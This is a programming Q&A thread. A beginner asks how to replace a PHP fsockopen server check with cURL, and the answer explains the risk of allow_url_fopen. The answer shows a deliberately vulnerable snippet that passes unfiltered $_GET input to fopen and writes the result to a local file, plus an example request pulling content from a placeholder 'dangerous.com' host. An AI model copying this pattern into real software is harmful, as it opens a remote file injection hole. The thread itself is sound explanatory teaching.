0

Hi all I have some code that's being run through a foreach loop:

        if($fp = @fsockopen($value['privateip'],1935,$errCode,$errStr,.5)){   
           $value['alive'] = 'alive';
        } else {
           $value['alive'] = 'down';
        } 
        @fclose($fp);

It basically pings my servers at port 1935 and then changes the value in an array. I have read php's file functions are dangerous if code injection occurs so they would probably be better off disabled. How can I change this code to use cURL instead?

slick1537
  • 745
  • 2
  • 8
  • 19
  • Did you try something ..?? Take a look here, it is not very difficult : http://www.php.net/manual/fr/function.curl-exec.php – MatRt May 14 '13 at 05:02
  • Are you confusing `fsockopen` with `fopen`? I think that article just said that using `fopen` when `allow_url_fopen` was risky. However, if your codes are written properly, there are no risks. – mpyw May 14 '13 at 05:04
  • I was under the impression that by disabling allow_url_open it also disabled fsockopen? – slick1537 May 14 '13 at 05:15
  • Also, I am pretty much a beginner as far as any type of programming goes. I constantly worry about code injection. – slick1537 May 14 '13 at 05:17
  • `allow_url_fopen` has nothing to do with `fsockopen`. – mpyw May 14 '13 at 05:38
  • I'll explain the risk about `fopen` on my answer, please wait a while. – mpyw May 14 '13 at 05:40

1 Answers1

0

Have a look at this code:

<?php

$filename = @$_GET['filename'];

$fp = fopen($filename,'r');
$buffer = '';
while (!feof($fp)) {
    $buffer .= fgets($fp,2048);    
}
fclose($fp);

$fp = fopen('something_very_important_data.txt','a');
fwrite($fp,$buffer);
fclose($fp);

when you get a request, like:

http://www.yourserver.com/your_script.php?filename=http%3A%2F%2Fdangerous.com%2Fdangerous_code.txt

$filename value will be like:

$filename = 'http://dangerous.com/dangerous_code.txt';

If allow_url_fopen is set on, this works.
As you may know, this is very dangerous.
To prevent this issue, set allow_url_fopen off, or completely filter $_GET, $_POST and so on.

mpyw
  • 5,526
  • 4
  • 30
  • 36